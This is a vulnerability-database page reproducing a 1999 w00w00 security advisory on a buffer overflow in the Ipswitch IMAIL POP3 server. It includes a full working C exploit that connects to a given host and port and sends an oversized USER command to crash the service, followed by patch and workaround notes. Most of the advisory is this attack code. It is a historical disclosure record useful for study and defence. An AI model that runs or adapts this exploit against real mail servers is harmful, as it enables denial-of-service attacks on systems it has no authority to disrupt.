Lucene search
K
Catalog
Vendors
Products
Timeline
Vulnerabilities
Sources
Documentation
Blog
Glossary
FAQ
Brand assets
Assessment
Agents dashboard
Agent Scanning
API Scanning
Assessment API
Alerts
Email notifications
Webhook notifications
Alerts API
SBOM package analysis
API Reference
Support
Settings
Sign in

imail.txt

🗓️ 08 Nov 1999 00:00:00Reported by Michael DavisType 
packetstorm
 packetstorm🔗 packetstormsecurity.com👁 32 Views

Buffer overflow in Ipswitch IMAIL POP3 server causes potential DoS attack due to poor validation.

Code
`w00w00 Security Development (WSD)  
  
[See http://www.datasurge.net/www.w00w00.org until relocation of  
w00w00.org is complete.]  
  
Discovered by: Interrupt ([email protected])  
  
Due to improper bounds checking in Ipswitch's IMAIL POP3 server, a buffer  
overflow occurs when a lengthy username is sent (via "USER <200-500  
character username>").  
  
It has been tested this on version 5.07, 5.05, and 5.06. According to  
Interrupt, it appears to be a DoS (denial of service) attack, but there  
has been no further testing to determine if it can be exploited to gain  
higher privileges.  
  
---------------------------------------------------------------------------  
Exploit (by Interrupt):  
  
/*  
* IMAIL 5.07 POP3 Overflow  
* By: [email protected]  
*  
* Demonstrates vulnerability  
*/  
  
#include <stdio.h>  
#include <string.h>  
  
#ifdef WINDOWS  
#include <windows.h>  
#include <winsock.h>  
#else  
#include <sys/types.h>  
#include <sys/socket.h>  
#include <netdb.h>  
#include <netinet/in.h>  
#endif  
  
#ifndef WINDOWS  
#define SOCKET_ERROR -1  
#define closesocket(sock) close(sock)  
#define WSACleanup() ;  
#endif  
  
char overflow[] =  
"USER AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA"  
"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA"  
"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA"  
"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA"  
"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA"  
"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA\n";  
  
int main(int argc, char *argv[])  
{  
#ifdef WINDOWS  
WSADATA wsaData;  
#endif  
  
struct hostent *hp;  
struct sockaddr_in sockin;  
char buf[300], *check;  
int sockfd, bytes;  
char *hostname;  
unsigned short port;  
  
if (argc <= 1)  
{  
printf("IMAIL POP3 Overflow\n");  
printf("By: [email protected]\n\n");  
  
printf("Usage: %s [hostname] [port]\n", argv[0]);  
printf("If port is not specified we use '110'\n");  
  
exit(0);  
}  
  
hostname = argv[1];  
if (argv[2]) port = atoi(argv[2]);  
else port = atoi("110");  
  
printf("IMAIL POP3 Overflow\n");  
printf("By: [email protected]\n\n");  
  
#ifdef WINDOWS  
if (WSAStartup(MAKEWORD(1, 1), &wsaData) < 0)  
{  
fprintf(stderr, "Error setting up with WinSock v1.1\n");  
exit(-1);  
}  
#endif  
  
hp = gethostbyname(hostname);  
if (hp == NULL)  
{  
printf("ERROR: Uknown host %s\n", hostname);  
exit(-1);  
}  
  
sockin.sin_family = hp->h_addrtype;  
sockin.sin_port = htons(port);  
sockin.sin_addr = *((struct in_addr *)hp->h_addr);  
  
if ((sockfd = socket(AF_INET, SOCK_STREAM, 0)) == SOCKET_ERROR)  
{  
printf("ERROR: Socket Error\n");  
exit(-1);  
}  
  
if ((connect(sockfd, (struct sockaddr *) &sockin,  
sizeof(sockin))) == SOCKET_ERROR)  
{  
printf("ERROR: Connect Error\n");  
closesocket(sockfd);  
WSACleanup();  
exit(-1);  
}  
  
printf("Connected to [%s] on port [%d], sending overflow....\n",  
hostname, port);  
  
/* Check to see if we get a +OK error code. If so then proceed. */  
if ((bytes = recv(sockfd, buf, 300, 0)) == SOCKET_ERROR)  
{  
printf("ERROR: Recv Error\n");  
closesocket(sockfd);  
WSACleanup();  
exit(1);  
}  
  
buf[bytes] = '\0';  
check = strstr(buf, "+OK");  
if (check == NULL)  
{  
printf("ERROR: NO +OK response from inital connect\n");  
closesocket(sockfd);  
WSACleanup();  
exit(-1);  
}  
  
if (send(sockfd, overflow, strlen(overflow),0) == SOCKET_ERROR)  
{  
printf("ERROR: Send Error\n");  
closesocket(sockfd);  
WSACleanup();  
exit(-1);  
}  
  
printf("Sent.\n");  
  
closesocket(sockfd);  
WSACleanup();  
}  
  
---------------------------------------------------------------------------  
Patch:  
  
Ipswitch has patched the vulnerability and the latest version can be  
downloaded from:  
ftp://ftp.ipswitch.com/Ipswitch/Product_Support/IMail/imail508.exe  
  
If you are unable to install the patch, a temporary workaround is to set  
the IMAIL monitor to 10 secons, guaranteeing a quick refreshment period.  
---------------------------------------------------------------------------  
  
Contributors to w00giving '99: awr, jobe, Sangfroid, rfp, vacuum,  
interrupt, dmess0r, and K2  
  
People who deserve hellos: nocarrier, minus, daveg, nny, eEye Digital  
Security, SecurITeam, dark spyrit (of beavuh), and w00god blake  
  
w00sites that deserve mentioning:  
http://www.eEye.com  
http://www.napster.com  
http://www.technotronic.com  
htttp://www.beavuh.org  
http://www.securiteam.com  
  
  
  
  
  
`

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

Book a live demo
08 Nov 1999 00:00Current
7.4High risk
Vulners AI Score7.4
buffer overflowipswitch imaildenial of servicesecurity vulnerabilityproper bounds checking.
32